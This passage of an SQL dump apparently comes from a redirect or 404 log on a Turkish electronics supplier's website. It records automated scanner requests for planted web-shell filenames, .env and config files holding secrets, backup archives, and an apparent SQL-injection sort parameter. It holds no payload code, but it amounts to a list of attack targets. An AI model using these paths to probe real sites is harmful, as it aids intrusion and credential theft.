00:00:00',301),(38396,'http://3s-technologies.com.tr/tr/wp-admin/css/ok.php',NULL,'http://3s-technologies.com.tr//wp-admin/css/OK.php','',20,0,'2025-03-14 14:32:16','0000-00-00 00:00:00',301),(38397,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpcall-button/button-image.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/wpcall-button/button-image.php','',5,0,'2025-03-14 14:32:22','0000-00-00 00:00:00',301),(38398,'http://3s-technologies.com.tr/tr/alfa-ioxi.php',NULL,'http://3s-technologies.com.tr//alfa-ioxi.php','',8,0,'2025-03-14 14:32:24','0000-00-00 00:00:00',301),(38399,'http://3s-technologies.com.tr/tr/wp-content/threefox_exploit/threefox.php',NULL,'http://3s-technologies.com.tr//wp-content/ThreeFox_Exploit/threefox.php','',3,0,'2025-03-14 14:32:25','0000-00-00 00:00:00',301),(38400,'http://3s-technologies.com.tr/tr/bypass1.php',NULL,'http://3s-technologies.com.tr//bypass1.php','',3,0,'2025-03-14 14:32:35','0000-00-00 00:00:00',301),(38401,'http://3s-technologies.com.tr/tr/wp-content/plugins/fighter/ultra.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/fighter/ultra.php','',3,0,'2025-03-14 14:32:36','0000-00-00 00:00:00',301),(38402,'http://3s-technologies.com.tr/tr/wp-content/plugins/fighter/fk.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/fighter/fk.php','',3,0,'2025-03-14 14:32:37','0000-00-00 00:00:00',301),(38403,'http://3s-technologies.com.tr/tr/al.php',NULL,'http://3s-technologies.com.tr//al.php','',90,0,'2025-03-14 14:32:38','0000-00-00 00:00:00',301),(38404,'http://3s-technologies.com.tr/tr/wp-content/uploads/import-export-for-woocommerce/product/import_manual_1737090262.php',NULL,'http://3s-technologies.com.tr//wp-content/uploads/import-export-for-woocommerce/product/import_manual_1737090262.php','',3,0,'2025-03-14 14:32:39','0000-00-00 00:00:00',301),(38405,'http://3s-technologies.com.tr/tr/wp-content/themes/mha/db.php?u',NULL,'http://3s-technologies.com.tr//wp-content/themes/mha/db.php?u','',3,0,'2025-03-14 14:32:40','0000-00-00 00:00:00',301),(38406,'http://3s-technologies.com.tr/tr/wp-content/themes/dikan/db.php?u',NULL,'http://3s-technologies.com.tr//wp-content/themes/dikan/db.php?u','',3,0,'2025-03-14 14:32:41','0000-00-00 00:00:00',301),(38407,'http://3s-technologies.com.tr/tr/wp-admin/includes/moon.php',NULL,'http://3s-technologies.com.tr//wp-admin/includes/moon.php','',3,0,'2025-03-14 14:32:42','0000-00-00 00:00:00',301),(38408,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoxx/asasx.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/seoxx/asasx.php','',3,0,'2025-03-14 14:32:42','0000-00-00 00:00:00',301),(38409,'http://3s-technologies.com.tr/tr/wp-content/bk/index.php',NULL,'http://3s-technologies.com.tr//wp-content/bk/index.php','',3,0,'2025-03-14 14:32:43','0000-00-00 00:00:00',301),(38410,'http://3s-technologies.com.tr/tr/class-db.php',NULL,'http://3s-technologies.com.tr//class-db.php','',9,0,'2025-03-14 14:32:44','0000-00-00 00:00:00',301),(38411,'http://3s-technologies.com.tr/tr/wp-content/class-db.php',NULL,'http://3s-technologies.com.tr//wp-content/class-db.php','',3,0,'2025-03-14 14:32:45','0000-00-00 00:00:00',301),(38412,'http://3s-technologies.com.tr/tr/wp-includes/class-db.php',NULL,'http://3s-technologies.com.tr//wp-includes/class-db.php','',3,0,'2025-03-14 14:32:46','0000-00-00 00:00:00',301),(38413,'http://3s-technologies.com.tr/tr/vendor/htmlawed/htmlawed/htmlawedtest.php',NULL,'http://3s-technologies.com.tr//vendor/htmlawed/htmlawed/htmLawedTest.php','',3,0,'2025-03-14 14:32:47','0000-00-00 00:00:00',301),(38414,'http://3s-technologies.com.tr/tr/wp-content/plugins/chosen.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/chosen.php','',3,0,'2025-03-14 14:32:49','0000-00-00 00:00:00',301),(38415,'http://3s-technologies.com.tr/tr/lv.php',NULL,'http://3s-technologies.com.tr//lv.php','',343,0,'2025-03-14 14:32:50','0000-00-00 00:00:00',301),(38416,'http://3s-technologies.com.tr/tr/wp-content/plugins/classic-editor/wp-login.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/classic-editor/wp-login.php','',6,0,'2025-03-14 14:32:51','0000-00-00 00:00:00',301),(38417,'http://3s-technologies.com.tr/tr/wp-content/themes/travelscape/json.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/travelscape/json.php','',38,0,'2025-03-14 14:32:52','0000-00-00 00:00:00',301),(38418,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-filesystem-base.php',NULL,'http://3s-technologies.com.tr//wp-admin/includes/class-wp-filesystem-base.php','',5,0,'2025-03-14 14:32:57','0000-00-00 00:00:00',301),(38419,'http://3s-technologies.com.tr/tr/themes/zmousse/otuz1.php',NULL,'http://3s-technologies.com.tr//themes/zMousse/otuz1.php','',77,0,'2025-03-14 14:33:02','0000-00-00 00:00:00',301),(38420,'http://3s-technologies.com.tr/tr/ga13.php',NULL,'http://3s-technologies.com.tr//GA13.php','',3,0,'2025-03-14 14:33:04','0000-00-00 00:00:00',301),(38421,'http://3s-technologies.com.tr/tr/wp-content/themes/hariko/lib.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/hariko/lib.php','',3,0,'2025-03-14 14:33:05','0000-00-00 00:00:00',301),(38422,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/admin/wp-fclass.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/wp-help/admin/wp-fclass.php','',46,0,'2025-03-14 14:33:06','0000-00-00 00:00:00',301),(38423,'http://3s-technologies.com.tr/tr/wp-apxupx.php',NULL,'http://3s-technologies.com.tr//wp-apxupx.php','',11,0,'2025-03-14 14:33:07','0000-00-00 00:00:00',301),(38424,'http://3s-technologies.com.tr/tr/wp-content/plugins/tunnelforms/lib.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/tunnelforms/lib.php','',3,0,'2025-03-14 14:33:08','0000-00-00 00:00:00',301),(38425,'http://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/b1ack.php',NULL,'http://3s-technologies.com.tr//wp-content/uploads/wpr-addons/forms/b1ack.php','',15,0,'2025-03-14 14:33:09','0000-00-00 00:00:00',301),(38426,'http://3s-technologies.com.tr/tr/bads.php',NULL,'http://3s-technologies.com.tr//bads.php','',3,0,'2025-03-14 14:33:12','0000-00-00 00:00:00',301),(38427,'http://3s-technologies.com.tr/tr/wp-includes/id3/bads.php',NULL,'http://3s-technologies.com.tr//wp-includes/ID3/bads.php','',3,0,'2025-03-14 14:33:13','0000-00-00 00:00:00',301),(38428,'http://3s-technologies.com.tr/tr/wp-content/bads/index.php?bads',NULL,'http://3s-technologies.com.tr//wp-content/bads/index.php?bads','',3,0,'2025-03-14 14:33:14','0000-00-00 00:00:00',301),(38429,'http://3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-library.php',NULL,'http://3s-technologies.com.tr//wp-includes/fonts/class-wp-font-library.php','',5,0,'2025-03-14 14:33:15','0000-00-00 00:00:00',301),(38430,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',16,0,'2025-03-14 21:03:27','0000-00-00 00:00:00',301),(38431,'https://3s-technologies.com.tr/tr/abcabcabcabcabcabcabcabcabcabc',NULL,'','',1,0,'2025-03-15 02:00:52','0000-00-00 00:00:00',301),(38432,'http://3s-technologies.com.tr/tr/public.zip',NULL,'','',3,0,'2025-03-15 22:46:13','0000-00-00 00:00:00',301),(38433,'http://3s-technologies.com.tr/tr/bak.zip',NULL,'','',1,0,'2025-03-15 22:46:14','0000-00-00 00:00:00',301),(38434,'http://3s-technologies.com.tr/tr/clickandbuilds.zip',NULL,'','',1,0,'2025-03-15 23:38:52','0000-00-00 00:00:00',301),(38435,'http://3s-technologies.com.tr/en/apple-touch-icon.png',NULL,'','',2,0,'2025-03-16 09:32:47','0000-00-00 00:00:00',301),(38436,'http://3s-technologies.com.tr/en/apple-touch-icon-precomposed.png',NULL,'','',2,0,'2025-03-16 09:32:47','0000-00-00 00:00:00',301),(38437,'http://3s-technologies.com.tr/tr/html.zip',NULL,'','',1,0,'2025-03-16 19:16:33','0000-00-00 00:00:00',301),(38438,'http://3s-technologies.com.tr/tr/website.zip',NULL,'','',1,0,'2025-03-16 19:16:34','0000-00-00 00:00:00',301),(38439,'http://3s-technologies.com.tr/tr/pack.zip',NULL,'','',1,0,'2025-03-16 19:17:19','0000-00-00 00:00:00',301),(38440,'http://3s-technologies.com.tr/tr/docs.zip',NULL,'','',2,0,'2025-03-16 19:17:20','0000-00-00 00:00:00',301),(38441,'http://3s-technologies.com.tr/tr/old.zip',NULL,'','',4,0,'2025-03-16 19:17:21','0000-00-00 00:00:00',301),(38442,'https://3s-technologies.com.tr/wp-content/plugins/about.php',NULL,'http://3s-technologies.com.tr','',3,0,'2025-03-17 01:37:39','0000-00-00 00:00:00',301),(38443,'http://3s-technologies.com.tr/wp-content/plugins/about.php',NULL,'http://3s-technologies.com.tr','',3,0,'2025-03-17 01:37:40','0000-00-00 00:00:00',301),(38444,'https://3s-technologies.com.tr/wp.php',NULL,'http://3s-technologies.com.tr','',1,0,'2025-03-17 01:37:46','0000-00-00 00:00:00',301),(38445,'https://3s-technologies.com.tr/tr/backup/.env',NULL,'','',9,0,'2025-03-17 03:13:44','0000-00-00 00:00:00',301),(38446,'https://3s-technologies.com.tr/tr/sites/.env',NULL,'','',2,0,'2025-03-17 03:13:54','0000-00-00 00:00:00',301),(38447,'https://3s-technologies.com.tr/tr/all/.env',NULL,'','',2,0,'2025-03-17 03:13:54','0000-00-00 00:00:00',301),(38448,'https://3s-technologies.com.tr/tr/libraries/.env',NULL,'','',2,0,'2025-03-17 03:13:55','0000-00-00 00:00:00',301),(38449,'https://3s-technologies.com.tr/tr/mailchimp/.env',NULL,'','',2,0,'2025-03-17 03:13:56','0000-00-00 00:00:00',301),(38450,'https://3s-technologies.com.tr/tr/.env.example',NULL,'','',14,0,'2025-03-17 03:13:56','0000-00-00 00:00:00',301),(38451,'https://3s-technologies.com.tr/tr/.env.save',NULL,'','',32,0,'2025-03-17 03:13:57','0000-00-00 00:00:00',301),(38452,'https://3s-technologies.com.tr/tr/.env.development',NULL,'','',15,0,'2025-03-17 03:13:58','0000-00-00 00:00:00',301),(38453,'https://3s-technologies.com.tr/tr/.env.dev.local',NULL,'','',2,0,'2025-03-17 03:14:00','0000-00-00 00:00:00',301),(38454,'https://3s-technologies.com.tr/tr/.env.development.local',NULL,'','',2,0,'2025-03-17 03:14:00','0000-00-00 00:00:00',301),(38455,'https://3s-technologies.com.tr/tr/.env.docker.dev',NULL,'','',2,0,'2025-03-17 03:14:01','0000-00-00 00:00:00',301),(38456,'https://3s-technologies.com.tr/tr/.env.live',NULL,'','',9,0,'2025-03-17 03:14:02','0000-00-00 00:00:00',301),(38457,'https://3s-technologies.com.tr/tr/.env.php',NULL,'','',2,0,'2025-03-17 03:14:03','0000-00-00 00:00:00',301),(38458,'https://3s-technologies.com.tr/tr/.env.prod',NULL,'','',11,0,'2025-03-17 03:14:04','0000-00-00 00:00:00',301),(38459,'https://3s-technologies.com.tr/tr/.env.prod.local',NULL,'','',2,0,'2025-03-17 03:14:05','0000-00-00 00:00:00',301),(38460,'https://3s-technologies.com.tr/tr/.env.production.local',NULL,'','',2,0,'2025-03-17 03:14:05','0000-00-00 00:00:00',301),(38461,'https://3s-technologies.com.tr/tr/.env.sample.php',NULL,'','',2,0,'2025-03-17 03:14:06','0000-00-00 00:00:00',301),(38462,'https://3s-technologies.com.tr/tr/.env.stage',NULL,'','',8,0,'2025-03-17 03:14:07','0000-00-00 00:00:00',301),(38463,'https://3s-technologies.com.tr/tr/.env.test',NULL,'','',11,0,'2025-03-17 03:14:07','0000-00-00 00:00:00',301),(38464,'https://3s-technologies.com.tr/tr/.env.test.local',NULL,'','',2,0,'2025-03-17 03:14:08','0000-00-00 00:00:00',301),(38465,'https://3s-technologies.com.tr/tr/.env~',NULL,'','',10,0,'2025-03-17 03:14:09','0000-00-00 00:00:00',301),(38466,'https://3s-technologies.com.tr/tr/env.example',NULL,'','',2,0,'2025-03-17 03:14:09','0000-00-00 00:00:00',301),(38467,'https://3s-technologies.com.tr/tr/backend/.env',NULL,'','',39,0,'2025-03-17 03:14:10','0000-00-00 00:00:00',301),(38468,'https://3s-technologies.com.tr/tr/staging/.env',NULL,'','',10,0,'2025-03-17 03:14:12','0000-00-00 00:00:00',301),(38469,'https://3s-technologies.com.tr/tr/mail/.env',NULL,'','',3,0,'2025-03-17 03:14:13','0000-00-00 00:00:00',301),(38470,'http://3s-technologies.com.tr/tr/lsws/conf/httpd_config.xml',NULL,'','',2,0,'2025-03-17 05:14:50','0000-00-00 00:00:00',301),(38471,'https://3s-technologies.com.tr/tr/wp-content/plugins/really-simple-ssl/readme.txt',NULL,'','',1,0,'2025-03-17 19:47:11','0000-00-00 00:00:00',301),(38472,'https://3s-technologies.com.tr/tr/wp-content/plugins/noveldesign-store-directory/readme.txt',NULL,'','',1,0,'2025-03-17 20:03:19','0000-00-00 00:00:00',301),(38473,'https://mail.3s-technologies.com.tr/wp-content/plugins/about.php',NULL,'http://mail.3s-technologies.com.tr','',3,0,'2025-03-17 20:55:13','0000-00-00 00:00:00',301),(38474,'https://mail.3s-technologies.com.tr/en/wp-content/about.php',NULL,'http://mail.3s-technologies.com.tr','',3,0,'2025-03-17 20:55:14','0000-00-00 00:00:00',301),(38475,'http://mail.3s-technologies.com.tr/wp-content/plugins/about.php',NULL,'http://mail.3s-technologies.com.tr','',3,0,'2025-03-17 20:55:14','0000-00-00 00:00:00',301),(38476,'http://mail.3s-technologies.com.tr/en/wp-content/about.php',NULL,'http://mail.3s-technologies.com.tr','',3,0,'2025-03-17 20:55:15','0000-00-00 00:00:00',301),(38477,'https://mail.3s-technologies.com.tr/wp.php',NULL,'http://mail.3s-technologies.com.tr','',1,0,'2025-03-17 20:55:19','0000-00-00 00:00:00',301),(38478,'https://mail.3s-technologies.com.tr/en/about.php',NULL,'http://mail.3s-technologies.com.tr','',1,0,'2025-03-17 20:55:20','0000-00-00 00:00:00',301),(38479,'http://mail.3s-technologies.com.tr/wp.php',NULL,'http://mail.3s-technologies.com.tr','',1,0,'2025-03-17 20:55:20','0000-00-00 00:00:00',301),(38480,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',18,0,'2025-03-19 11:48:58','0000-00-00 00:00:00',301),(38481,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',16,0,'2025-03-19 11:48:59','0000-00-00 00:00:00',301),(38482,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',16,0,'2025-03-19 11:49:28','0000-00-00 00:00:00',301),(38483,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',21,0,'2025-03-19 11:49:31','0000-00-00 00:00:00',301),(38484,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',18,0,'2025-03-19 11:49:32','0000-00-00 00:00:00',301),(38485,'https://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/mx200lp-de',NULL,'','',2,0,'2025-03-19 11:50:03','0000-00-00 00:00:00',301),(38486,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name',NULL,'','',15,0,'2025-03-19 11:50:16','0000-00-00 00:00:00',301),(38487,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/dirdesc',NULL,'','',16,0,'2025-03-19 11:50:43','0000-00-00 00:00:00',301),(38488,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',22,0,'2025-03-19 11:50:46','0000-00-00 00:00:00',301),(38489,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',18,0,'2025-03-19 11:51:03','0000-00-00 00:00:00',301),(38490,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',17,0,'2025-03-19 11:51:43','0000-00-00 00:00:00',301),(38491,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,mf_name',NULL,'','',17,0,'2025-03-19 11:52:03','0000-00-00 00:00:00',301),(38492,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,ordering',NULL,'','',16,0,'2025-03-19 11:52:07','0000-00-00 00:00:00',301),(38493,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name',NULL,'','',19,0,'2025-03-19 11:52:09','0000-00-00 00:00:00',301),(38494,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc',NULL,'','',19,0,'2025-03-19 11:52:10','0000-00-00 00:00:00',301),(38495,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',19,0,'2025-03-19 11:52:13','0000-00-00 00:00:00',301),(38496,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,`p`.product_sku',NULL,'','',19,0,'2025-03-19 11:52:19','0000-00-00 00:00:00',301),(38497,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name',NULL,'','',16,0,'2025-03-19 11:52:23','0000-00-00 00:00:00',301),(38498,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',16,0,'2025-03-19 11:52:24','0000-00-00 00:00:00',301),(38499,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name',NULL,'','',14,0,'2025-03-19 11:52:27','0000-00-00 00:00:00',301),(38500,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,mf_name/dirdesc',NULL,'','',14,0,'2025-03-19 11:52:28','0000-00-00 00:00:00',301),(38501,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,ordering',NULL,'','',17,0,'2025-03-19 11:52:31','0000-00-00 00:00:00',301),(38502,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_sku',NULL,'','',10,0,'2025-03-19 11:52:37','0000-00-00 00:00:00',301),(38503,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/dirdesc',NULL,'','',11,0,'2025-03-19 11:52:41','0000-00-00 00:00:00',301),(38504,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/ls60v-detail/askquestion?tmpl=component',NULL,'','',9,0,'2025-03-19 21:31:13','0000-00-00 00:00:00',301),(38505,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,product_sku',NULL,'','',12,0,'2025-03-19 21:31:19','0000-00-00 00:00:00',301),(38506,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',7,0,'2025-03-19 21:31:20','0000-00-00 00:00:00',301),(38507,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',9,0,'2025-03-19 21:31:21','0000-00-00 00:00:00',301),(38508,'http://3s-technologies.com.tr/tr/mar/function.php',NULL,'http://3s-technologies.com.tr//mar/function.php','',2,0,'2025-03-21 09:04:01','0000-00-00 00:00:00',301),(38509,'http://3s-technologies.com.tr/tr/wp-content/plugins/seox/up.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/seox/up.php','',2,0,'2025-03-21 09:04:02','0000-00-00 00:00:00',301),(38510,'http://3s-technologies.com.tr/tr/wp-content/themes/wordpress-mag/up.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/wordpress-mag/up.php','',2,0,'2025-03-21 09:04:03','0000-00-00 00:00:00',301),(38511,'http://3s-technologies.com.tr/tr/wp-content/themes/wordpress-mag/0x1949.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/wordpress-mag/0x1949.php','',2,0,'2025-03-21 09:04:03','0000-00-00 00:00:00',301),(38512,'http://3s-technologies.com.tr/tr/wp-content/themes/pridmag/contact.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/pridmag/contact.php','',2,0,'2025-03-21 09:04:04','0000-00-00 00:00:00',301),(38513,'http://3s-technologies.com.tr/tr/uploaded_script.php',NULL,'http://3s-technologies.com.tr//uploaded_script.php','',6,0,'2025-03-21 09:04:05','0000-00-00 00:00:00',301),(38514,'http://3s-technologies.com.tr/tr/wp-content/plugins/fix5/index.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/fix5/index.php','',2,0,'2025-03-21 09:04:06','0000-00-00 00:00:00',301),(38515,'http://3s-technologies.com.tr/tr/wp-includes/text/network.php',NULL,'','',71,0,'2025-03-22 01:33:59','0000-00-00 00:00:00',301),(38516,'http://3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/wp-login.php',NULL,'','',58,0,'2025-03-22 01:34:00','0000-00-00 00:00:00',301),(38517,'http://3s-technologies.com.tr/tr/js/fm.php',NULL,'','',76,0,'2025-03-22 01:34:00','0000-00-00 00:00:00',301),(38518,'http://3s-technologies.com.tr/tr/wp-content/themes/astra/inc/ki1k.php',NULL,'','',124,0,'2025-03-22 01:34:01','0000-00-00 00:00:00',301),(38519,'http://3s-technologies.com.tr/tr/wordpress/wp-admin/includes/zmfm.php',NULL,'','',41,0,'2025-03-22 01:34:02','0000-00-00 00:00:00',301),(38520,'http://3s-technologies.com.tr/tr/wp-content/themes/cay-van-phong/filemanager.php',NULL,'','',56,0,'2025-03-22 01:34:04','0000-00-00 00:00:00',301),(38521,'http://3s-technologies.com.tr/tr/libraries/legacy/info.php',NULL,'','',38,0,'2025-03-22 01:34:07','0000-00-00 00:00:00',301),(38522,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/rk2.php',NULL,'','',46,0,'2025-03-22 01:34:10','0000-00-00 00:00:00',301),(38523,'http://3s-technologies.com.tr/tr/wordpress/wp-includes/wp-config-sample.php',NULL,'','',44,0,'2025-03-22 01:34:12','0000-00-00 00:00:00',301),(38524,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/.info.php',NULL,'','',42,0,'2025-03-22 01:34:12','0000-00-00 00:00:00',301),(38525,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/engine/about.php',NULL,'','',145,0,'2025-03-22 01:34:13','0000-00-00 00:00:00',301),(38526,'http://3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/img/about.php',NULL,'','',43,0,'2025-03-22 01:34:14','0000-00-00 00:00:00',301),(38527,'http://3s-technologies.com.tr/tr/wp-includes/block-supports/autoload_classmap.php',NULL,'','',46,0,'2025-03-22 01:34:15','0000-00-00 00:00:00',301),(38528,'http://3s-technologies.com.tr/tr/wp-content/uploads/classwithtostring.php',NULL,'','',47,0,'2025-03-22 01:34:16','0000-00-00 00:00:00',301),(38529,'http://3s-technologies.com.tr/tr/.well-known/link.php',NULL,'','',42,0,'2025-03-22 01:34:17','0000-00-00 00:00:00',301),(38530,'http://3s-technologies.com.tr/tr/wp-admin/chosen.php',NULL,'','',72,0,'2025-03-22 01:34:18','0000-00-00 00:00:00',301),(38531,'http://3s-technologies.com.tr/tr/wp-includes/assets/about.php',NULL,'','',61,0,'2025-03-22 01:34:20','0000-00-00 00:00:00',301),(38532,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/wp-login.php',NULL,'','',51,0,'2025-03-22 01:34:21','0000-00-00 00:00:00',301),(38533,'http://3s-technologies.com.tr/tr/assets/item.php',NULL,'','',49,0,'2025-03-22 01:34:22','0000-00-00 00:00:00',301),(38534,'http://3s-technologies.com.tr/tr/shop/lock.php',NULL,'','',39,0,'2025-03-22 01:34:23','0000-00-00 00:00:00',301),(38535,'http://3s-technologies.com.tr/tr/th/plugins/phpthumb/404.php',NULL,'','',26,0,'2025-03-22 01:34:23','0000-00-00 00:00:00',301),(38536,'http://3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/index.php',NULL,'','',52,0,'2025-03-22 01:34:24','0000-00-00 00:00:00',301),(38537,'http://3s-technologies.com.tr/tr/files/log.php',NULL,'','',31,0,'2025-03-22 01:34:25','0000-00-00 00:00:00',301),(38538,'http://3s-technologies.com.tr/tr/wp-includes/html-api/index.php',NULL,'','',40,0,'2025-03-22 01:34:26','0000-00-00 00:00:00',301),(38539,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/vuln.php',NULL,'','',22,0,'2025-03-22 01:34:28','0000-00-00 00:00:00',301),(38540,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/fields/index.php',NULL,'','',63,0,'2025-03-22 01:34:28','0000-00-00 00:00:00',301),(38541,'http://3s-technologies.com.tr/tr/wp-includes/images/media/wp-login.php',NULL,'','',29,0,'2025-03-22 01:34:29','0000-00-00 00:00:00',301),(38542,'http://3s-technologies.com.tr/tr/wp-content/languages/asus.php',NULL,'','',26,0,'2025-03-22 01:34:34','0000-00-00 00:00:00',301),(38543,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-login.php',NULL,'','',27,0,'2025-03-22 01:34:37','0000-00-00 00:00:00',301),(38544,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-pridmag/admin.php',NULL,'','',28,0,'2025-03-22 01:34:39','0000-00-00 00:00:00',301),(38545,'http://3s-technologies.com.tr/tr/wp-includes/text/wp-conflg.php',NULL,'','',67,0,'2025-03-22 01:34:39','0000-00-00 00:00:00',301),(38546,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/plugins.php',NULL,'','',21,0,'2025-03-22 01:34:40','0000-00-00 00:00:00',301),(38547,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/wp-login.php',NULL,'','',24,0,'2025-03-22 01:34:42','0000-00-00 00:00:00',301),(38548,'http://3s-technologies.com.tr/tr/wp-admin/images/users.php',NULL,'','',31,0,'2025-03-22 01:34:42','0000-00-00 00:00:00',301),(38549,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/endpoints/index.php',NULL,'','',42,0,'2025-03-22 01:34:43','0000-00-00 00:00:00',301),(38550,'http://3s-technologies.com.tr/tr/index/about.php',NULL,'','',25,0,'2025-03-22 01:34:45','0000-00-00 00:00:00',301),(38551,'http://3s-technologies.com.tr/tr/manager.php',NULL,'','',294,0,'2025-03-22 01:34:45','0000-00-00 00:00:00',301),(38552,'http://3s-technologies.com.tr/tr/wp-admin/user/content.php',NULL,'','',25,0,'2025-03-22 01:34:47','0000-00-00 00:00:00',301),(38553,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp.php',NULL,'','',30,0,'2025-03-22 01:34:49','0000-00-00 00:00:00',301),(38554,'http://3s-technologies.com.tr/tr/wp-admin/includes/index.php',NULL,'','',170,0,'2025-03-22 01:34:49','0000-00-00 00:00:00',301),(38555,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/cache/content.php',NULL,'','',22,0,'2025-03-22 01:34:50','0000-00-00 00:00:00',301),(38556,'http://3s-technologies.com.tr/tr/wp-content/themes/xmrlpc.php',NULL,'','',32,0,'2025-03-22 01:34:51','0000-00-00 00:00:00',301),(38557,'http://3s-technologies.com.tr/tr/wp-includes/js/wp-login.php',NULL,'','',33,0,'2025-03-22 01:34:51','0000-00-00 00:00:00',301),(38558,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/taptap-null.php',NULL,'','',23,0,'2025-03-22 01:34:52','0000-00-00 00:00:00',301),(38559,'http://3s-technologies.com.tr/tr/.well-known/as.php',NULL,'','',33,0,'2025-03-22 01:34:53','0000-00-00 00:00:00',301),(38560,'http://3s-technologies.com.tr/tr/.well-known/lv.php',NULL,'','',26,0,'2025-03-22 01:34:54','0000-00-00 00:00:00',301),(38561,'http://3s-technologies.com.tr/tr/wp-content/plugins/duplicator/assets/about.php',NULL,'','',24,0,'2025-03-22 01:34:56','0000-00-00 00:00:00',301),(38562,'http://3s-technologies.com.tr/tr/wp-admin/network/upfile.php',NULL,'','',26,0,'2025-03-22 01:34:57','0000-00-00 00:00:00',301),(38563,'http://3s-technologies.com.tr/tr/wp-content/upgrade/autoload_classmap.php',NULL,'','',27,0,'2025-03-22 01:34:59','0000-00-00 00:00:00',301),(38564,'http://3s-technologies.com.tr/tr/images/cjfuns.php',NULL,'','',24,0,'2025-03-22 01:35:00','0000-00-00 00:00:00',301),(38565,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/content.php',NULL,'','',21,0,'2025-03-22 01:35:01','0000-00-00 00:00:00',301),(38566,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/admin.php',NULL,'','',23,0,'2025-03-22 01:35:02','0000-00-00 00:00:00',301),(38567,'http://3s-technologies.com.tr/tr/wp-includes/js/crop/zmfm.php',NULL,'','',36,0,'2025-03-22 01:35:02','0000-00-00 00:00:00',301),(38568,'http://3s-technologies.com.tr/tr/wp-includes/js/about.php',NULL,'','',40,0,'2025-03-22 01:35:04','0000-00-00 